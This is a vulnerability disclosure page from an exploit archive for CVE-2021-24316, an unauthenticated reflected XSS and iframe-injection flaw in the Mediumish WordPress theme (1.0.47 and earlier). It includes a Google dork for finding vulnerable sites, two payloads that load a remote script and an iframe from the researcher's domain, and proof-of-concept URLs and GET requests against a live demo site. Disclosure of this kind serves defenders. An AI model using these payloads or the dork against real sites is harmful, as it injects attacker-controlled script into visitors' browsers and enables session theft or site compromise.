Mediumish WordPress Theme <= 1.0.47 - Unauthenticated Reflected XSS & XFS

2021.05.17
ru m0ze (RU) ru
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

/*! - # VULNERABILITY: Mediumish WordPress Theme <= 1.0.47 - Unauthenticated Reflected XSS & XFS - # GOOGLE DORK: inurl:/wp-content/themes/mediumish/ - # DATE: 2021-03-14 - # SECURITY RESEARCHER: m0ze [ https://m0ze.ru ] - # VENDOR: WowThemes [ https://wowthemes.net ] - # SOFTWARE VERSION: <= 1.0.47 - # SOFTWARE LINK: https://www.wowthemes.net/themes/mediumish-wordpress/ - # CVSS: AV:N/AC:L/PR:N/UI:N/S:C - # CWE: CWE-79 - # CVE: CVE-2021-24316 */ ### -- [ Info: ] [i] An Unauthenticated Reflected XSS & XFS vulnerabilities was discovered in the Mediumish theme through 1.0.47 for WordPress. [i] For successful exploitation, malicious JavaScript code or iFrame must be injected into the search query. ### -- [ Impact: ] [~] Malicious JavaScript code or iFrame injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource. ### -- [ Payloads: ] [$] "><script src=https://m0ze.ru/payload/a2r.js></script> [$] "><iframe src=https://m0ze.ru/payload/xfsii.html></iframe> ### -- [ PoC #1 | Unauthenticated Reflected XSS & XFS | Search query: ] [!] https://www.themepush.com/demo-mediumish/?post_type=post&s=%22%3E%3Cscript+src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fa2r.js%3E%3C%2Fscript%3E [!] GET /demo-mediumish/?post_type=post&s=%22%3E%3Cscript+src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fa2r.js%3E%3C%2Fscript%3E HTTP/1.1 Host: www.themepush.com ### -- [ PoC #2 | Unauthenticated Reflected XSS & XFS | Search query: ] [!] https://www.themepush.com/demo-mediumish/?post_type=post&s=%22%3E%3Ciframe+src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fxfsii.html%3E%3C%2Fiframe%3E [!] GET /demo-mediumish/?post_type=post&s=%22%3E%3Ciframe+src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fxfsii.html%3E%3C%2Fiframe%3E HTTP/1.1 Host: www.themepush.com ### -- [ Contacts: ] [+] Website: m0ze.ru [+] GitHub: @m0ze [+] Telegram: @m0ze_ru [+] Twitter: @vladm0ze

References:

https://m0ze.ru/vulnerability/%5B2021-03-14%5D-%5BWordPress%5D-%5BCWE-79%5D-Mediumish-WordPress-Theme-v1.0.47.txt
https://twitter.com/vladm0ze


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top